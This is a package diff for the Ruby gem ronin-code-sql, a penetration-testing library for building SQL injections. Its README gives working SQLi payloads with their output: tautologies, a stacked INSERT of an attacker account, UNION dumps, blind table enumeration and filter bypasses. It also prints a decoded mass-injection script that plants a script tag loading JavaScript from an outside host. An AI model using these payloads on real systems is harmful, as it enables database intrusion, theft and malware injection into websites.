ronin-code-sql 2.0.0.beta1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (62) hide show
  1. checksums.yaml +7 -0
  2. data/.document +4 -0
  3. data/.editorconfig +11 -0
  4. data/.github/workflows/ruby.yml +27 -0
  5. data/.gitignore +11 -0
  6. data/.mailmap +1 -0
  7. data/.rspec +1 -0
  8. data/.ruby-version +1 -0
  9. data/.yardopts +1 -0
  10. data/COPYING.txt +165 -0
  11. data/ChangeLog.md +104 -0
  12. data/Gemfile +28 -0
  13. data/README.md +212 -0
  14. data/Rakefile +30 -0
  15. data/gemspec.yml +25 -0
  16. data/lib/ronin/code/sql/binary_expr.rb +53 -0
  17. data/lib/ronin/code/sql/clause.rb +74 -0
  18. data/lib/ronin/code/sql/clauses.rb +310 -0
  19. data/lib/ronin/code/sql/emittable.rb +88 -0
  20. data/lib/ronin/code/sql/emitter.rb +406 -0
  21. data/lib/ronin/code/sql/field.rb +110 -0
  22. data/lib/ronin/code/sql/fields.rb +82 -0
  23. data/lib/ronin/code/sql/function.rb +53 -0
  24. data/lib/ronin/code/sql/functions.rb +1265 -0
  25. data/lib/ronin/code/sql/injection.rb +168 -0
  26. data/lib/ronin/code/sql/injection_expr.rb +113 -0
  27. data/lib/ronin/code/sql/literal.rb +40 -0
  28. data/lib/ronin/code/sql/literals.rb +83 -0
  29. data/lib/ronin/code/sql/operators.rb +384 -0
  30. data/lib/ronin/code/sql/statement.rb +72 -0
  31. data/lib/ronin/code/sql/statement_list.rb +112 -0
  32. data/lib/ronin/code/sql/statements.rb +117 -0
  33. data/lib/ronin/code/sql/unary_expr.rb +38 -0
  34. data/lib/ronin/code/sql/version.rb +28 -0
  35. data/lib/ronin/code/sql.rb +96 -0
  36. data/ronin-code-sql.gemspec +62 -0
  37. data/spec/spec_helper.rb +3 -0
  38. data/spec/sql/binary_expr_examples.rb +25 -0
  39. data/spec/sql/binary_expr_spec.rb +5 -0
  40. data/spec/sql/clause_examples.rb +43 -0
  41. data/spec/sql/clause_spec.rb +31 -0
  42. data/spec/sql/clauses_spec.rb +47 -0
  43. data/spec/sql/emittable_spec.rb +41 -0
  44. data/spec/sql/emitter_spec.rb +533 -0
  45. data/spec/sql/field_spec.rb +103 -0
  46. data/spec/sql/fields_spec.rb +40 -0
  47. data/spec/sql/function_examples.rb +30 -0
  48. data/spec/sql/function_spec.rb +25 -0
  49. data/spec/sql/functions_spec.rb +113 -0
  50. data/spec/sql/injection_expr_spec.rb +98 -0
  51. data/spec/sql/injection_spec.rb +172 -0
  52. data/spec/sql/literal_spec.rb +5 -0
  53. data/spec/sql/literals_spec.rb +46 -0
  54. data/spec/sql/operators_spec.rb +44 -0
  55. data/spec/sql/statement_examples.rb +39 -0
  56. data/spec/sql/statement_list_spec.rb +48 -0
  57. data/spec/sql/statement_spec.rb +38 -0
  58. data/spec/sql/statements_spec.rb +22 -0
  59. data/spec/sql/unary_expr_examples.rb +20 -0
  60. data/spec/sql/unary_expr_spec.rb +5 -0
  61. data/spec/sql_spec.rb +18 -0
  62. metadata +157 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: fc5de90b2961287f9110ba16c922ad1b8e787563d7fb93a075834cb6935b2da9
4
+ data.tar.gz: 61e12da2b15fa8306677b1f0bcaa1c1b973512bb5339e162af7eca6f15fdfb19
5
+ SHA512:
6
+ metadata.gz: 43387545e4de6ca18387df0ac5a8af970b0b99ce6fc0300094e61bc2898351dbeae176bd66ab0e097cf0028e164cf8c19c8841787839b71a8e964627b53be9c3
7
+ data.tar.gz: 3b057ebcd0be473896562afb5d4159ab9930c1a0008f789f3c8473991b452eee485b0dfa8351b02401945b0b9c2777d21257e325ed5bd823ab1685a10e617109
data/.document ADDED
@@ -0,0 +1,4 @@
1
+ lib/**/*.rb
2
+ -
3
+ ChangeLog.md
4
+ COPYING.txt
data/.editorconfig ADDED
@@ -0,0 +1,11 @@
1
+ root = true
2
+
3
+ [*]
4
+ end_of_line = lf
5
+ insert_final_newline = true
6
+ tab_width = 8
7
+ trim_trailing_whitespace = true
8
+
9
+ [{Gemfile,Rakefile,*.rb,*.gemspec,*.yml}]
10
+ indent_style = space
11
+ indent_size = 2
@@ -0,0 +1,27 @@
1
+ name: CI
2
+
3
+ on: [ push, pull_request ]
4
+
5
+ jobs:
6
+ tests:
7
+ runs-on: ubuntu-latest
8
+ strategy:
9
+ fail-fast: false
10
+ matrix:
11
+ ruby:
12
+ - '3.0'
13
+ - '3.1'
14
+ - '3.2'
15
+ - jruby
16
+ - truffleruby
17
+ name: Ruby ${{ matrix.ruby }}
18
+ steps:
19
+ - uses: actions/checkout@v2
20
+ - name: Set up Ruby
21
+ uses: ruby/setup-ruby@v1
22
+ with:
23
+ ruby-version: ${{ matrix.ruby }}
24
+ - name: Install dependencies
25
+ run: bundle install --jobs 4 --retry 3
26
+ - name: Run tests
27
+ run: bundle exec rake test
data/.gitignore ADDED
@@ -0,0 +1,11 @@
1
+ doc
2
+ pkg
3
+ vendor/cache
4
+ Gemfile.lock
5
+ .bundle
6
+ .DS_Store
7
+ .yardoc
8
+ *.db
9
+ *.log
10
+ *.swp
11
+ *~
data/.mailmap ADDED
@@ -0,0 +1 @@
1
+ Postmodern <postmodern.mod3@gmail.com> postmodern <postmodern.mod3@gmail.com>
data/.rspec ADDED
@@ -0,0 +1 @@
1
+ --colour --format documentation
data/.ruby-version ADDED
@@ -0,0 +1 @@
1
+ ruby-3.1
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --markup markdown --title 'Ronin SQL Documentation' --protected
data/COPYING.txt ADDED
@@ -0,0 +1,165 @@
1
+ GNU LESSER GENERAL PUBLIC LICENSE
2
+ Version 3, 29 June 2007
3
+
4
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
5
+ Everyone is permitted to copy and distribute verbatim copies
6
+ of this license document, but changing it is not allowed.
7
+
8
+
9
+ This version of the GNU Lesser General Public License incorporates
10
+ the terms and conditions of version 3 of the GNU General Public
11
+ License, supplemented by the additional permissions listed below.
12
+
13
+ 0. Additional Definitions.
14
+
15
+ As used herein, "this License" refers to version 3 of the GNU Lesser
16
+ General Public License, and the "GNU GPL" refers to version 3 of the GNU
17
+ General Public License.
18
+
19
+ "The Library" refers to a covered work governed by this License,
20
+ other than an Application or a Combined Work as defined below.
21
+
22
+ An "Application" is any work that makes use of an interface provided
23
+ by the Library, but which is not otherwise based on the Library.
24
+ Defining a subclass of a class defined by the Library is deemed a mode
25
+ of using an interface provided by the Library.
26
+
27
+ A "Combined Work" is a work produced by combining or linking an
28
+ Application with the Library. The particular version of the Library
29
+ with which the Combined Work was made is also called the "Linked
30
+ Version".
31
+
32
+ The "Minimal Corresponding Source" for a Combined Work means the
33
+ Corresponding Source for the Combined Work, excluding any source code
34
+ for portions of the Combined Work that, considered in isolation, are
35
+ based on the Application, and not on the Linked Version.
36
+
37
+ The "Corresponding Application Code" for a Combined Work means the
38
+ object code and/or source code for the Application, including any data
39
+ and utility programs needed for reproducing the Combined Work from the
40
+ Application, but excluding the System Libraries of the Combined Work.
41
+
42
+ 1. Exception to Section 3 of the GNU GPL.
43
+
44
+ You may convey a covered work under sections 3 and 4 of this License
45
+ without being bound by section 3 of the GNU GPL.
46
+
47
+ 2. Conveying Modified Versions.
48
+
49
+ If you modify a copy of the Library, and, in your modifications, a
50
+ facility refers to a function or data to be supplied by an Application
51
+ that uses the facility (other than as an argument passed when the
52
+ facility is invoked), then you may convey a copy of the modified
53
+ version:
54
+
55
+ a) under this License, provided that you make a good faith effort to
56
+ ensure that, in the event an Application does not supply the
57
+ function or data, the facility still operates, and performs
58
+ whatever part of its purpose remains meaningful, or
59
+
60
+ b) under the GNU GPL, with none of the additional permissions of
61
+ this License applicable to that copy.
62
+
63
+ 3. Object Code Incorporating Material from Library Header Files.
64
+
65
+ The object code form of an Application may incorporate material from
66
+ a header file that is part of the Library. You may convey such object
67
+ code under terms of your choice, provided that, if the incorporated
68
+ material is not limited to numerical parameters, data structure
69
+ layouts and accessors, or small macros, inline functions and templates
70
+ (ten or fewer lines in length), you do both of the following:
71
+
72
+ a) Give prominent notice with each copy of the object code that the
73
+ Library is used in it and that the Library and its use are
74
+ covered by this License.
75
+
76
+ b) Accompany the object code with a copy of the GNU GPL and this license
77
+ document.
78
+
79
+ 4. Combined Works.
80
+
81
+ You may convey a Combined Work under terms of your choice that,
82
+ taken together, effectively do not restrict modification of the
83
+ portions of the Library contained in the Combined Work and reverse
84
+ engineering for debugging such modifications, if you also do each of
85
+ the following:
86
+
87
+ a) Give prominent notice with each copy of the Combined Work that
88
+ the Library is used in it and that the Library and its use are
89
+ covered by this License.
90
+
91
+ b) Accompany the Combined Work with a copy of the GNU GPL and this license
92
+ document.
93
+
94
+ c) For a Combined Work that displays copyright notices during
95
+ execution, include the copyright notice for the Library among
96
+ these notices, as well as a reference directing the user to the
97
+ copies of the GNU GPL and this license document.
98
+
99
+ d) Do one of the following:
100
+
101
+ 0) Convey the Minimal Corresponding Source under the terms of this
102
+ License, and the Corresponding Application Code in a form
103
+ suitable for, and under terms that permit, the user to
104
+ recombine or relink the Application with a modified version of
105
+ the Linked Version to produce a modified Combined Work, in the
106
+ manner specified by section 6 of the GNU GPL for conveying
107
+ Corresponding Source.
108
+
109
+ 1) Use a suitable shared library mechanism for linking with the
110
+ Library. A suitable mechanism is one that (a) uses at run time
111
+ a copy of the Library already present on the user's computer
112
+ system, and (b) will operate properly with a modified version
113
+ of the Library that is interface-compatible with the Linked
114
+ Version.
115
+
116
+ e) Provide Installation Information, but only if you would otherwise
117
+ be required to provide such information under section 6 of the
118
+ GNU GPL, and only to the extent that such information is
119
+ necessary to install and execute a modified version of the
120
+ Combined Work produced by recombining or relinking the
121
+ Application with a modified version of the Linked Version. (If
122
+ you use option 4d0, the Installation Information must accompany
123
+ the Minimal Corresponding Source and Corresponding Application
124
+ Code. If you use option 4d1, you must provide the Installation
125
+ Information in the manner specified by section 6 of the GNU GPL
126
+ for conveying Corresponding Source.)
127
+
128
+ 5. Combined Libraries.
129
+
130
+ You may place library facilities that are a work based on the
131
+ Library side by side in a single library together with other library
132
+ facilities that are not Applications and are not covered by this
133
+ License, and convey such a combined library under terms of your
134
+ choice, if you do both of the following:
135
+
136
+ a) Accompany the combined library with a copy of the same work based
137
+ on the Library, uncombined with any other library facilities,
138
+ conveyed under the terms of this License.
139
+
140
+ b) Give prominent notice with the combined library that part of it
141
+ is a work based on the Library, and explaining where to find the
142
+ accompanying uncombined form of the same work.
143
+
144
+ 6. Revised Versions of the GNU Lesser General Public License.
145
+
146
+ The Free Software Foundation may publish revised and/or new versions
147
+ of the GNU Lesser General Public License from time to time. Such new
148
+ versions will be similar in spirit to the present version, but may
149
+ differ in detail to address new problems or concerns.
150
+
151
+ Each version is given a distinguishing version number. If the
152
+ Library as you received it specifies that a certain numbered version
153
+ of the GNU Lesser General Public License "or any later version"
154
+ applies to it, you have the option of following the terms and
155
+ conditions either of that published version or of any later version
156
+ published by the Free Software Foundation. If the Library as you
157
+ received it does not specify a version number of the GNU Lesser
158
+ General Public License, you may choose any version of the GNU Lesser
159
+ General Public License ever published by the Free Software Foundation.
160
+
161
+ If the Library as you received it specifies that a proxy can decide
162
+ whether future versions of the GNU Lesser General Public License shall
163
+ apply, that proxy's public statement of acceptance of any version is
164
+ permanent authorization for you to choose that version for the
165
+ Library.
data/ChangeLog.md ADDED
@@ -0,0 +1,104 @@
1
+ ### 2.0.0 / 2023-XX-XX
2
+
3
+ * Require `ruby` >= 3.0.0.
4
+ * Added [ronin-support] ~> 0.1 as a dependency.
5
+ * Renmaed `ronin/formatting/sql` to `ronin/support/encoding/sql` and moved it
6
+ back into [ronin-support].
7
+
8
+ [ronin-support]: https://github.com/ronin-rb/ronin-support#readme
9
+
10
+ ### 1.1.0 / 2013-01-22
11
+
12
+ * Added `Ronin::SQL::InjectionExpr`, so that statements specified within
13
+ `and { }`, `or { }` blocks would not be appending to the
14
+ `Ronin::SQL::Injection` object.
15
+ * Made `Ronin::SQL::Field` emittable.
16
+ * Added `Ronin::SQL::Emitter#emit_argument`, so that any sub-statements will
17
+ be wrapped in `( )`.
18
+ * Improved `Ronin::SQL::Emitter#emit_field`.
19
+ * Fixed `Ronin::SQL::Emitter#emit` to pass `Ronin::SQL::Function`s to
20
+ `Ronin::SQL::Emitter#emit_function`.
21
+
22
+ ### 1.0.0 / 2013-01-21
23
+
24
+ * Require [Ruby] >= 1.9.1.
25
+ * No longer require ronin.
26
+ * No longer require ronin-web.
27
+ * Added `String#sql_unescape`.
28
+ * Moved `String#sql_escape`, `String#sql_encode` and `String#sql_decode`
29
+ from [ronin-support].
30
+ * Refactored the `Ronin::SQL SQL` DSL to be more like
31
+ [ARel](https://github.com/rails/arel#readme).
32
+ * Moved the DSL from `Ronin::Code::SQL` into `Ronin::SQL`.
33
+ * Removed `Ronin::SQL::Error`.
34
+ * Removed `String#sql_error`.
35
+ * Removed `String#sql_error?`.
36
+ * Removed `URI::HTTP.has_sql_errors?`.
37
+ * Removed `URI::HTTP.sql_error`.
38
+ * Removed `URI::HTTP.sql_errors`.
39
+
40
+ ### 0.2.4 / 2009-09-24
41
+
42
+ * Require ronin >= 0.3.0.
43
+ * Require ronin-web >= 0.2.0.
44
+ * Require rspec >= 1.1.12.
45
+ * Require yard >= 0.2.3.5.
46
+ * Updated the project summary and 3-point description for Ronin SQL.
47
+ * Moved to YARD based documentation.
48
+ * Fixed a formatting issue in the README.txt file, which was causing RDoc
49
+ to crash.
50
+
51
+ ### 0.2.3 / 2009-07-02
52
+
53
+ * Use Hoe >= 2.0.0.
54
+ * Require ronin >= 0.2.4.
55
+ * Require ronin-web >= 0.1.3.
56
+ * Use Ronin::Scanners::Scanner to define the scanner for finding
57
+ `Ronin::SQL::Injection` objects for URI::HTTP urls.
58
+ * Added more specs.
59
+
60
+ ### 0.2.2 / 2009-01-22
61
+
62
+ * Depend on the new ronin-web library.
63
+ * Replace Hpricot with Nokogiri.
64
+ * Use the new Ronin::Web::Spider, instead of directly using Spidr.
65
+ * Use the new Nokogiri extensions from ronin-web.
66
+
67
+ ### 0.2.1 / 2009-01-09
68
+
69
+ * Added missing files to the Manifest.
70
+
71
+ ### 0.2.0 / 2009-01-08
72
+
73
+ * Require ronin >= 0.1.3.
74
+ * Refactored `Ronin::Code::SQL`.
75
+ * Implemented a token emitter system.
76
+ * Support common SQL expression modifiers.
77
+ * Support common SQL clauses.
78
+ * Allow for injecting arbitrary SQL clauses.
79
+ * Added more SQL Injection test generators.
80
+ * all_rows: `OR 1 = 1`
81
+ * exact_rows: `AND 1 = 1`
82
+ * no_rows: `AND 1 = 0`
83
+ * has_column?(column): `OR column IS NOT NULL`
84
+ * has_table?(table): `AND (SELECT FROM table count(*) == 1)`
85
+ * uses_column?(column): `GROUP BY column HAVING 1 = 1`
86
+ * uses_table?(table): `OR table IS NOT NULL`
87
+ * Removed references to `Ronin::Vulnerable`.
88
+ * Added more specs:
89
+ * Specs for most of `Ronin::Code::SQL`.
90
+ * Specs on `Ronin::SQL::Error` and the SQL encoding/decoding extensions for
91
+ the String class.
92
+
93
+ ### 0.1.1 / 2008-09-28
94
+
95
+ * Trivial bug fix to `URI::HTTP#sql_errors`.
96
+
97
+ ### 0.1.0 / 2007-12-23
98
+
99
+ * Initial release.
100
+ * Supports SQL code generation.
101
+ * Supports obfuscation of SQL code.
102
+ * Supports SQL Injection code generation.
103
+
104
+ [Ruby]: http://www.ruby-lang.org/
data/Gemfile ADDED
@@ -0,0 +1,28 @@
1
+ source 'https://rubygems.org'
2
+
3
+ gemspec
4
+
5
+ platform :jruby do
6
+ gem 'jruby-openssl', '~> 0.7'
7
+ end
8
+
9
+ # Library dependencies
10
+ # gem 'ronin-support', '~> 1.0', github: "ronin-rb/ronin-support",
11
+ # branch: 'main'
12
+
13
+ group :development do
14
+ gem 'rake'
15
+ gem 'rubygems-tasks', '~> 0.1'
16
+
17
+ gem 'rspec', '~> 3.0'
18
+ gem 'simplecov', '~> 0.20'
19
+
20
+ gem 'kramdown', '~> 2.3'
21
+ gem 'redcarpet', platform: :mri
22
+ gem 'yard', '~> 0.9'
23
+ gem 'yard-spellcheck', require: false
24
+
25
+ gem 'dead_end', require: false
26
+ gem 'sord', require: false, platform: :mri
27
+ gem 'stackprof', require: false, platform: :mri
28
+ end
data/README.md ADDED
@@ -0,0 +1,212 @@
1
+ # ronin-code-sql
2
+
3
+ [![CI](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml/badge.svg)](https://github.com/ronin-rb/ronin-code-sql/actions/workflows/ruby.yml)
4
+ [![Code Climate](https://codeclimate.com/github/ronin-rb/ronin-code-sql.svg)](https://codeclimate.com/github/ronin-rb/ronin-code-sql)
5
+
6
+ * [Source](https://github.com/ronin-rb/ronin-code-sql)
7
+ * [Issues](https://github.com/ronin-rb/ronin-code-sql/issues)
8
+ * [Documentation](https://ronin-rb.dev/docs/ronin-code-sql/frames)
9
+ * [Discord](https://discord.gg/6WAb3PsVX9) |
10
+ [Twitter](https://twitter.com/ronin_rb) |
11
+ [Mastodon](https://infosec.exchange/@ronin_rb)
12
+
13
+ ## Description
14
+
15
+ {Ronin::Code::SQL} is a Ruby DSL for crafting [SQL Injections (SQLi)][SQLi].
16
+
17
+ ### Features
18
+
19
+ * Provides convenience methods for encoding/decoding SQL data.
20
+ * Provides an Domain Specific Language (DSL) for crafting normal SQL and
21
+ [SQL injections][SQLi].
22
+ * Has 99% documentation coverage.
23
+ * Has 98% test coverage.
24
+
25
+ ## Examples
26
+
27
+ ### Convenience Methods
28
+
29
+ Escape a String:
30
+
31
+ ```ruby
32
+ "O'Brian".sql_escape
33
+ # => "'O''Brian'"
34
+ ```
35
+
36
+ Unescapes a SQL String:
37
+
38
+ ```ruby
39
+ "'O''Brian'".sql_unescape
40
+ # => "O'Briand"
41
+ ```
42
+
43
+ Hex encode a String:
44
+
45
+ ```ruby
46
+ "exploit".sql_encode
47
+ # => "0x6578706c6f6974"
48
+ ```
49
+
50
+ Hex decode a String:
51
+
52
+ ```ruby
53
+ string = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
54
+ string.sql_decode
55
+ # => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
56
+ ```
57
+
58
+ ### SQLi DSL
59
+
60
+ Injecting a `1=1` test into a Integer comparison:
61
+
62
+ ```ruby
63
+ sqli = Ronin::Code::SQL::Injection.new
64
+ sqli.or { 1 == 1 }
65
+ puts sqli
66
+ # 1 OR 1=1
67
+ ```
68
+
69
+ Injecting a `1=1` test into a String comparison:
70
+
71
+ ```ruby
72
+ sqli = Ronin::Code::SQL::Injection.new(escape: :string)
73
+ sqli.or { string(1) == string(1) }
74
+ puts sqli
75
+ # 1' OR '1'='1
76
+ ```
77
+
78
+ Columns:
79
+
80
+ ```ruby
81
+ sqli = Ronin::Code::SQL::Injection.new
82
+ sqli.and { admin == 1 }
83
+ puts sqli
84
+ # 1 AND admin=1
85
+ ```
86
+
87
+ Clauses:
88
+
89
+ ```ruby
90
+ sqli = Ronin::Code::SQL::Injection.new
91
+ sqli.or { 1 == 1 }.limit(0)
92
+ puts sqli
93
+ # 1 OR 1=1 LIMIT 0
94
+ ```
95
+
96
+ Statements:
97
+
98
+ ```ruby
99
+ sqli = Ronin::Code::SQL::Injection.new
100
+ sqli.and { 1 == 0 }
101
+ sqli.insert.into(:users).values('hacker','passw0rd','t')
102
+ puts sqli
103
+ # 1 AND 1=0; INSERT INTO users VALUES ('hacker','passw0rd','t')
104
+ ```
105
+
106
+ Sub-Statements:
107
+
108
+ ```ruby
109
+ sqli = Ronin::Code::SQL::Injection.new
110
+ sqli.union { select(1,2,3,4,id).from(users) }
111
+ puts sqli
112
+ # 1 UNION SELECT (1,2,3,4,id) FROM users
113
+ ```
114
+
115
+ Test if a table exists:
116
+
117
+ ```ruby
118
+ sqli = Ronin::Code::SQL::Injection.new
119
+ sqli.and { select(count).from(:users) == 1 }
120
+ puts sqli
121
+ # 1 AND (SELECT COUNT(*) FROM users)=1
122
+ ```
123
+
124
+ Create errors by using non-existant tables:
125
+
126
+ ```ruby
127
+ sqli = Ronin::Code::SQL::Injection.new(escape: :string)
128
+ sqli.and { non_existant_table == '1' }
129
+ puts sqli
130
+ # 1' AND non_existant_table='1
131
+ ```
132
+
133
+ Dumping all values of a column:
134
+
135
+ ```ruby
136
+ sqli = Ronin::Code::SQL::Injection.new(escape: :string)
137
+ sqli.or { username.is_not(null) }.or { username == '' }
138
+ puts sqli
139
+ # 1' OR username IS NOT NULL OR username='
140
+ ```
141
+
142
+ Enumerate through database table names:
143
+
144
+ ```ruby
145
+ sqli = Ronin::Code::SQL::Injection.new
146
+ sqli.and {
147
+ ascii(
148
+ lower(
149
+ substring(
150
+ select(:name).top(1).from(sysobjects).where { xtype == 'U' }, 1, 1
151
+ )
152
+ )
153
+ ) > 116
154
+ }
155
+ puts sqli
156
+ # 1 AND ASCII(LOWER(SUBSTRING((SELECT name TOP 1 FROM sysobjects WHERE xtype='U'),1,1)))>116
157
+ ```
158
+
159
+ Find user supplied tables via the `sysObjects` table:
160
+
161
+ ```ruby
162
+ sqli = Ronin::Code::SQL::Injection.new
163
+ sqli.union_all {
164
+ select(1,2,3,4,5,6,name).from(sysObjects).where { xtype == 'U' }
165
+ }
166
+ puts sqli.to_sql(terminate: true)
167
+ # 1 UNION ALL (SELECT (1,2,3,4,5,6,name) FROM sysObjects WHERE xtype='U');--
168
+ ```
169
+
170
+ Bypass filters using `/**/` instead of spaces:
171
+
172
+ ```ruby
173
+ sqli = Ronin::Code::SQL::Injection.new
174
+ sqli.union { select(1,2,3,4,id).from(users) }
175
+ puts sqli.to_sql(space: '/**/')
176
+ # 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users
177
+ ```
178
+
179
+ ## Requirements
180
+
181
+ * [Ruby] >= 3.0.0
182
+ * [ronin-support] ~> 1.0
183
+
184
+ ## Install
185
+
186
+ ```shell
187
+ $ gem install ronin-code-sql
188
+ ```
189
+
190
+ ## License
191
+
192
+ ronin-code-sql - A Ruby DSL for crafting SQL Injections.
193
+
194
+ Copyright (c) 2007-2022 Hal Brodigan (postmodern.mod3 at gmail.com)
195
+
196
+ ronin-code-sql is free software: you can redistribute it and/or modify
197
+ it under the terms of the GNU Lesser General Public License as published
198
+ by the Free Software Foundation, either version 3 of the License, or
199
+ (at your option) any later version.
200
+
201
+ ronin-code-sql is distributed in the hope that it will be useful,
202
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
203
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
204
+ GNU Lesser General Public License for more details.
205
+
206
+ You should have received a copy of the GNU Lesser General Public License
207
+ along with ronin-code-sql. If not, see <https://www.gnu.org/licenses/>.
208
+
209
+ [SQLi]: http://en.wikipedia.org/wiki/SQL_injection
210
+
211
+ [Ruby]: http://www.ruby-lang.org
212
+ [ronin-support]: https://github.com/ronin-rb/ronin-support#readme
data/Rakefile ADDED
@@ -0,0 +1,30 @@
1
+ require 'rubygems'
2
+
3
+ begin
4
+ require 'bundler'
5
+ rescue LoadError => e
6
+ warn e.message
7
+ warn "Run `gem install bundler` to install Bundler."
8
+ exit e.status_code
9
+ end
10
+
11
+ begin
12
+ Bundler.setup(:development)
13
+ rescue Bundler::BundlerError => e
14
+ warn e.message
15
+ warn "Run `bundle install` to install missing gems"
16
+ exit e.status_code
17
+ end
18
+
19
+ require 'rake'
20
+
21
+ require 'rubygems/tasks'
22
+ Gem::Tasks.new(sign: {checksum: true, pgp: true})
23
+
24
+ require 'rspec/core/rake_task'
25
+ RSpec::Core::RakeTask.new
26
+ task :test => :spec
27
+ task :default => :spec
28
+
29
+ require 'yard'
30
+ YARD::Rake::YardocTask.new
data/gemspec.yml ADDED
@@ -0,0 +1,25 @@
1
+ name: ronin-code-sql
2
+ summary: A Ruby DSL for crafting SQL Injections.
3
+ description:
4
+ ronin-code-sql is a Ruby DSL for crafting SQL Injections.
5
+
6
+ license: LGPL-3.0
7
+ authors: Postmodern
8
+ email: postmodern.mod3@gmail.com
9
+ homepage: https://github.com/ronin-rb/ronin-code-sql#readme
10
+ has_yard: true
11
+
12
+ metadata:
13
+ documentation_uri: https://rubydoc.info/gems/ronin-code-sql
14
+ source_code_uri: https://github.com/ronin-rb/ronin-code-sql
15
+ bug_tracker_uri: https://github.com/ronin-rb/ronin-code-sql/issues
16
+ changelog_uri: https://github.com/ronin-rb/ronin-code-sql/blob/master/ChangeLog.md
17
+ rubygems_mfa_required: 'true'
18
+
19
+ required_ruby_version: ">= 3.0.0"
20
+
21
+ dependencies:
22
+ ronin-support: ~> 1.0.0.beta1
23
+
24
+ development_dependencies:
25
+ bundler: ~> 2.0